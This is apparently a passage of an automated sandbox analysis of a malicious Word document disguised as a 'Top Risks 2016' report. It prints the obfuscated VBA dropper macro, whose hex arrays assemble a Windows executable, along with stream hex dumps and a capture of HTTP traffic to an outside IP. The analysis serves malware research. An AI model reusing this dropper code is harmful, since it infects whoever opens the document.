    nhbminn bwoqrj, Array(&H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H40, &H0, &H30, &H40, &H2E , &H72, &H65, &H6C, &H6F, &H63, &H0, &H0, &H80, &H1, &H0, &H0, &H0, &H50, &H0, &H0, &H0, &H2, &H0, &H0, &H0,  &H26, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H40, &H0, &H30, &H42, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0 , &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0)

    nhbminn bwoqrj, Array(&H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &

VBA Code

Attribute VB_Name = "Module1"

Dim ayyvl As New Class1
Sub gybmpmh()
Set ayyvl.xyyac = Word.Application
End Sub
Sub nhbminn(ByRef bwoqrj, buocduzjc)
Dim ehhnqmy
On Error Resume Next
 wmepjfbcg = UBound(bwoqrj)
If Err.Number <> (740 - 740) Then
wmepjfbcg = -(5918 - 5917)
End If
On Error GoTo 0
 
aakrflbn = UBound(buocduzjc)
ReDim Preserve bwoqrj(wmepjfbcg + aakrflbn + 1)
For ehhnqmy = (4056 - 4056) To aakrflbn
bwoqrj(ehhnqmy + wmepjfbcg + 1) = buocduzjc(ehhnqmy)
Next
End Sub
Function wgexjhl(cdnkyy)
Dim ehhnqmy
wgexjhl = pedugbr(Array(), (-339 + 555))
For ehhnqmy = LBound(cdnkyy) To UBound(cdnkyy)
wgexjhl = wgexjhl & (Chr(cdnkyy(ehhnqmy)))
Next
End Function
Sub jncepsvg(ByRef bwoqrj)
nhbminn bwoqrj, Array(&H4D, &H5A, &H90, &H0, &H3, &H0, &H0, &H0, &H4, &H0, &H0, &H0, &HFF, &HFF, &H0, &H0, &HB8 , &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H40, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0,  &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H80, &H0, &H0, &H0, &HE, &H1F, &HBA, &HE, &H0, &HB4, &H9, &HCD, &H21, &HB8, &H1, &H4C, &HCD, &H21 , &H54, &H68, &H69, &H73, &H20, &H70, &H72, &H6F, &H67, &H72, &H61, &H6D, &H20, &H63, &H61, &H6E, &H6E, &H6F)
nhbminn bwoqrj, Array(&H74, &H20, &H62, &H65, &H20, &H72, &H75, &H6E, &H20, &H69, &H6E, &H20, &H44, &H4F, &H53, &H20, &H6D , &H6F, &H64, &H65, &H2E, &HD, &HD, &HA, &H24, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H50, &H45, &H0, &H0, &H4C,  &H1, &H4, &H0, &H50, &H31, &H59, &H31, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &HE0, &H0, &HE, &H23, &HB, &H1, &H2, &H18, &H0, &H1A, &H0, &H0, &H0, &HA, &H0, &H0, &H0, &H0, &H0, &H0, &HF9, &H23, &H0, &H0, &H0, &H0 , &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H40, &H0, &H0, &H10, &H0, &H0, &H0, &H2, &H0, &H0)
nhbminn bwoqrj, Array(&H1, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H3, &H0, &HA, &H0, &H0, &H0, &H0, &H0, &H0 , &H60, &H0, &H0, &H0, &H4, &H0, &H0, &HF6, &H83, &H0, &H0, &H3, &H0, &H40, &H0, &H0, &H10, &H0, &H0, &H0,  &H10, &H0, &H0, &H0, &H0, &H1, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H10, &H0, &H0, &H0, &H0, &H40, &H0, &H0, &H68, &H0, &H0, &H0, &H0, &H30, &H0, &H0, &HFA, &H4, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0 , &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0)
nhbminn bwoqrj, Array(&H0, &H50, &H0, &H0, &H80, &H1, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0 , &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0,  &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0 , &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H2E, &H63, &H6F, &H64, &H65, &H0, &H0, &H0)
nhbminn bwoqrj, Array(&H2, &H18, &H0, &H0, &H0, &H10, &H0, &H0, &H0, &H1A, &H0, &H0, &H0, &H4, &H0, &H0, &H0 , &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H20, &H0, &H30, &HE0, &H2E, &H69, &H64, &H61, &H74,  &H61, &H0, &H0, &HFA, &H4, &H0, &H0, &H0, &H30, &H0, &H0, &H0, &H6, &H0, &H0, &H0, &H1E, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H40, &H0, &H30, &HC0, &H2E, &H65, &H64, &H61, &H74, &H61 , &H0, &H0, &H68, &H0, &H0, &H0, &H0, &H40, &H0, &H0, &H0, &H2, &H0, &H0, &H0, &H24, &H0, &H0)
nhbminn bwoqrj, Array(&H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H40, &H0, &H30, &H40, &H2E , &H72, &H65, &H6C, &H6F, &H63, &H0, &H0, &H80, &H1, &H0, &H0, &H0, &H50, &H0, &H0, &H0, &H2, &H0, &H0, &H0,  &H26, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H40, &H0, &H30, &H42, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0 , &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0)
nhbminn bwoqrj, Array(&H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0 , &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0, &H0,

VBA File Name: ThisDocument.cls, Stream Size: 1097

General
Stream Path:	Macros/VBA/ThisDocument
VBA File Name:	ThisDocument.cls
Stream Size:	1097
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . D . . . R . . . . . . . . . . . . . . . . \\ s . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . < . . . . . M c . = . 2 B I . . G . . P . q . . p V r . $ N . . 5 2 W . Z . . . . . . . . . . . . . . . . . . . . . . . T / ' . ! @ . . . . L . H P . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . T / ' . ! @ . . . . L . H P M c . = . 2 B I . . G . . P . q . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 06 00 01 00 00 16 03 00 00 e4 00 00 00 ea 01 00 00 44 03 00 00 52 03 00 00 a6 03 00 00 00 00 00 00 01 00 00 00 87 5c 73 f9 00 00 ff ff a3 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 3c 00 ff ff 00 00 4d 63 b1 3d 86 32 42 49 ac da 47 cb ef 50 d1 71 ce c9 70 56 72 d3 24 4e 8b 17 35 32 57 d5 5a 07 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code with Deobfuscations

Attribute VB_Name = "ThisDocument"

Attribute VB_Base = "1Normal.ThisDocument"

Attribute VB_GlobalNameSpace = False

Attribute VB_Creatable = False

Attribute VB_PredeclaredId = True

Attribute VB_Exposed = True

Attribute VB_TemplateDerived = True

Attribute VB_Customizable = True

VBA Code

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 121

General
Stream Path:	\x1CompObj
File Type:	data
Stream Size:	121
Entropy:	4.36374049783
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . F ' . . . M i c r o s o f t O f f i c e W o r d 9 7 - 2 0 0 3 D o c u m e n t . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 27 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 57 6f 72 64 20 39 37 2d 32 30 30 33 20 44 6f 63 75 6d 65 6e 74 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5DocumentSummaryInformation
File Type:	data
Stream Size:	4096
Entropy:	0.864029729664
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . D . . . . . . . . . . . . . . . + , . . L . . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E u r a s i a g r o u p . n e t . . . . . . . . D . . . . . . . . . . . . . . . . % . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 06 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 44 00 00 00 05 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 4c 01 00 00 08 01 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 8c 00 00 00 06 00 00 00 94 00 00 00 11 00 00 00 9c 00 00 00 17 00 00 00 a4 00 00 00 0b 00 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5SummaryInformation
File Type:	data
Stream Size:	4096
Entropy:	0.536766333457
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . < . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . T o p R i s k s 2 0 1 6 . . . . . . . . . . . . . . . . . . . . . . E G _ C K u p c h a n .
Data Raw:	fe ff 00 00 06 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 80 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 b0 00 00 00 04 00 00 00 bc 00 00 00 05 00 00 00 d0 00 00 00 06 00 00 00 dc 00 00 00 07 00 00 00 e8 00 00 00 08 00 00 00 fc 00 00 00 09 00 00 00 10 01 00 00

Stream Path: 1Table, File Type: data, Stream Size: 8624

General
Stream Path:	1Table
File Type:	data
Stream Size:	8624
Entropy:	5.61096276895
Base64 Encoded:	True
Data ASCII:	j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
Data Raw:	6a 04 12 00 12 00 01 00 0b 01 0f 00 07 00 06 00 06 00 06 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00

Stream Path: Data, File Type: data, Stream Size: 137675

General
Stream Path:	Data
File Type:	data
Stream Size:	137675
Entropy:	7.90682141357
Base64 Encoded:	True
Data ASCII:	. * . . D . d . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . . . A . . . . . . . . . . ? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . i . c . t . u . r . e . . 3 . . . . . . . . . . . . . . . b . . . Z ) . . . . B J . i . . * J . . . . . . ] . . . 6 ) . . . . . . D . . . . . . . . n . . . ) . . B J . i . . * J . . . . . . ] . . . P N G .
Data Raw:	18 2a 00 00 44 00 64 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 9e 17 90 06 f4 01 f4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 6a 00 00 00 b2 04 0a f0 08 00 00 00 02 04 00 00 00 0a 00 00 83 00 0b f0 46 00 00 00 bf 00 04 00 04 00 04 41 01 00 00 00 05 c1 02 00 00 00 3f 01 00 00 06 00 bf 01 00 00

Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 451

General
Stream Path:	Macros/PROJECT
File Type:	ASCII text, with CRLF line terminators
Stream Size:	451
Entropy:	5.29685117534
Base64 Encoded:	True
Data ASCII:	I D = " { 1 D 2 3 5 0 3 0 - 3 3 4 E - 4 F 5 3 - 8 E D 3 - F 0 8 A 4 8 1 C 0 2 7 C } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . C l a s s = C l a s s 1 . . M o d u l e = M o d u l e 1 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 9 B 9 9 3 5 B 4 2 C B 8 2 C B 8 2 C B 8 2 C B 8 " . . D P B = " 8 E 8 C 2 0 C 9 E 0 4 F D 2 5 0 D 2 5 0 D 2 " . . G C = " 8 1 8 3 2 F 3 0 3 0 3 0 3
Data Raw:	49 44 3d 22 7b 31 44 32 33 35 30 33 30 2d 33 33 34 45 2d 34 46 35 33 2d 38 45 44 33 2d 46 30 38 41 34 38 31 43 30 32 37 43 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 43 6c 61 73 73 3d 43 6c 61 73 73 31 0d 0a 4d 6f 64 75 6c 65 3d 4d 6f 64 75 6c 65 31 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c

Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 86

General
Stream Path:	Macros/PROJECTwm
File Type:	data
Stream Size:	86
Entropy:	3.33757783544
Base64 Encoded:	False
Data ASCII:	T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . C l a s s 1 . C . l . a . s . s . 1 . . . M o d u l e 1 . M . o . d . u . l . e . 1 . . . . .
Data Raw:	54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 43 6c 61 73 73 31 00 43 00 6c 00 61 00 73 00 73 00 31 00 00 00 4d 6f 64 75 6c 65 31 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 31 00 00 00 00 00

Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 4934

General
Stream Path:	Macros/VBA/_VBA_PROJECT
File Type:	data
Stream Size:	4934
Entropy:	5.01251614613
Base64 Encoded:	False
Data ASCII:	. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 1 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
Data Raw:	cc 61 85 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00

Stream Path: Macros/VBA/__SRP_0, File Type: data, Stream Size: 1238

General
Stream Path:	Macros/VBA/__SRP_0
File Type:	data
Stream Size:	1238
Entropy:	4.25650919772
Base64 Encoded:	False
Data ASCII:	. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * \\ C N o r m a l r U . . . . . . . . . . . . . . . . . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ l . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . X . . . . N . . p . 2 . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . e . . . . . . . . . i . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	93 4b 2a 85 01 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 01 00 09 00 00 00 2a 5c 43 4e 6f 72 6d 61 6c 72 55 00 01 00 00 80 00 00 00 80 00 00 00 80 00 00 00 04 00 00 7e 05 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00

Stream Path: Macros/VBA/__SRP_1, File Type: data, Stream Size: 110

General
Stream Path:	Macros/VBA/__SRP_1
File Type:	data
Stream Size:	110
Entropy:	2.19841915646
Base64 Encoded:	False
Data ASCII:	r U . . . . . . . . . . . . . . . . . . . ~ } . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ! . . . . . . . . . . . . . . . p . . . . . . .
Data Raw:	72 55 80 00 00 00 80 00 00 00 80 00 00 00 80 00 00 00 01 00 00 7e 7d 00 00 7f 00 00 00 00 0a 00 00 00 09 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 09 00 00 00 00 00 03 00 ff ff ff ff ff ff ff ff 03 00 00 09 d9 02 00 00 00 00 00 00 21 06 00 00 00 00 00 00 08 00 00 00 00 00 01 00 70 00 00 7f 00 00 00 00

Stream Path: Macros/VBA/__SRP_2, File Type: data, Stream Size: 220

General
Stream Path:	Macros/VBA/__SRP_2
File Type:	data
Stream Size:	220
Entropy:	2.16227617229
Base64 Encoded:	False
Data ASCII:	r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4 . . . ! . . . . . . . a . . . . . . . I . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` . . . . . . .
Data Raw:	72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 1e 00 00 00 09 00 00 00 00 00 00 00 09 00 00 00 00 00 03 00 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 01 00 00 00 01 00 a9 05 00 00 00 00 00 00 d1 05 00 00 00 00 00 00 f9 05 00 00 00 00 00 00 09 00 00 00 01 00 02 00 81 05 00 00 00 00 00 00 08 00 0d 00 34 00 00 00 21 06 00 00 00 00 00 00 61 00 00 00 00 00

Stream Path: Macros/VBA/__SRP_3, File Type: data, Stream Size: 66

General
Stream Path:	Macros/VBA/__SRP_3
File Type:	data
Stream Size:	66
Entropy:	1.75895870298
Base64 Encoded:	False
Data ASCII:	r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . n . . . . . . .
Data Raw:	72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 10 00 00 00 09 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff 00 00 00 00 40 00 00 00 04 00 00 00 00 00 00 00 6e 00 00 7f 00 00 00 00

Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 601

General
Stream Path:	Macros/VBA/dir
File Type:	data
Stream Size:	601
Entropy:	6.42123725647
Base64 Encoded:	True
Data ASCII:	. U . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . . l . . . . . . . . . ) . . Y 3 . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ s y s t e m 3 . 2 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . E N o r m a l . . E N . C r . m . a Q . F . . . . . . . * , \\ C . . . . ( . m . .
Data Raw:	01 55 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 29 fd 87 59 33 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30

Stream Path: MsoDataStore/ATA\x1964\x206L\x222OU4\x198\x218\x223\x223U\x194\x195WU\x219Q==/Item, File Type: ASCII text, with no line terminators, Stream Size: 252

General
Stream Path:	MsoDataStore/ATA\x1964\x206L\x222OU4\x198\x218\x223\x223U\x194\x195WU\x219Q==/Item
File Type:	ASCII text, with no line terminators
Stream Size:	252
Entropy:	4.97775183557
Base64 Encoded:	False
Data ASCII:	< b : S o u r c e s S e l e c t e d S t y l e = " \\ A P A S i x t h E d i t i o n O f f i c e O n l i n e . x s l " S t y l e N a m e = " A P A " V e r s i o n = " 6 " x m l n s : b = " h t t p : / / s c h e m a s . o p e n x m l f o r m a t s . o r g / o f f i c e D o c u m e n t / 2 0 0 6 / b i b l i o g r a p h y " x m l n s = " h t t p : / / s c h e m a s . o p e n x m l f o r m a t s . o r g / o f f i c e D o c u m e n t / 2 0 0 6 / b i b l i o g r a p h y " > < / b : S o u r c e s >
Data Raw:	3c 62 3a 53 6f 75 72 63 65 73 20 53 65 6c 65 63 74 65 64 53 74 79 6c 65 3d 22 5c 41 50 41 53 69 78 74 68 45 64 69 74 69 6f 6e 4f 66 66 69 63 65 4f 6e 6c 69 6e 65 2e 78 73 6c 22 20 53 74 79 6c 65 4e 61 6d 65 3d 22 41 50 41 22 20 56 65 72 73 69 6f 6e 3d 22 36 22 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6f 70 65 6e 78 6d 6c 66 6f 72 6d 61 74 73 2e 6f

Stream Path: MsoDataStore/ATA\x1964\x206L\x222OU4\x198\x218\x223\x223U\x194\x195WU\x219Q==/Properties, File Type: XML document text, Stream Size: 341

General
Stream Path:	MsoDataStore/ATA\x1964\x206L\x222OU4\x198\x218\x223\x223U\x194\x195WU\x219Q==/Properties
File Type:	XML document text
Stream Size:	341
Entropy:	5.26055945721
Base64 Encoded:	True
Data ASCII:	< ? x m l v e r s i o n = " 1 . 0 " e n c o d i n g = " U T F - 8 " s t a n d a l o n e = " n o " ? > . . < d s : d a t a s t o r e I t e m d s : i t e m I D = " { 7 A 2 4 3 0 0 1 - F E E 2 - 4 7 3 9 - A 6 E B - F F D 4 8 A 3 5 9 4 E D } " x m l n s : d s = " h t t p : / / s c h e m a s . o p e n x m l f o r m a t s . o r g / o f f i c e D o c u m e n t / 2 0 0 6 / c u s t o m X m l " > < d s : s c h e m a R e f s > < d s : s c h e m a R e f d s : u r i = " h t t p : / / s c h e m a s . o p e n
Data Raw:	3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 20 73 74 61 6e 64 61 6c 6f 6e 65 3d 22 6e 6f 22 3f 3e 0d 0a 3c 64 73 3a 64 61 74 61 73 74 6f 72 65 49 74 65 6d 20 64 73 3a 69 74 65 6d 49 44 3d 22 7b 37 41 32 34 33 30 30 31 2d 46 45 45 32 2d 34 37 33 39 2d 41 36 45 42 2d 46 46 44 34 38 41 33 35 39 34 45 44 7d 22 20 78 6d 6c

Stream Path: WordDocument, File Type: data, Stream Size: 156073

General
Stream Path:	WordDocument
File Type:	data
Stream Size:	156073
Entropy:	7.87028968837
Base64 Encoded:	True
Data ASCII:	. . . . [ . . . . . . . . . . . . . . . . . . . . . . . . - . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . % . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . n . . . . . . . n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D .
Data Raw:	ec a5 c1 00 5b 80 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 db 2d 00 00 0e 00 62 6a 62 6a ac fa ac fa 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 04 16 00 a9 61 02 00 ce 90 01 00 ce 90 01 00 db 25 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 7, 2016 12:46:49.272285938 CEST	55511	53	192.168.1.22	8.8.8.8
Sep 7, 2016 12:46:49.952840090 CEST	53	55511	8.8.8.8	192.168.1.22
Sep 7, 2016 12:46:49.991893053 CEST	55160	53	192.168.1.22	8.8.8.8
Sep 7, 2016 12:46:50.554362059 CEST	53	55160	8.8.8.8	192.168.1.22
Sep 7, 2016 12:46:50.557013988 CEST	49206	80	192.168.1.22	176.9.16.213
Sep 7, 2016 12:46:50.557069063 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:50.557212114 CEST	49206	80	192.168.1.22	176.9.16.213
Sep 7, 2016 12:46:50.558581114 CEST	49206	80	192.168.1.22	176.9.16.213
Sep 7, 2016 12:46:50.558615923 CEST	80	49206	176.9.16.213	192.168.1.22
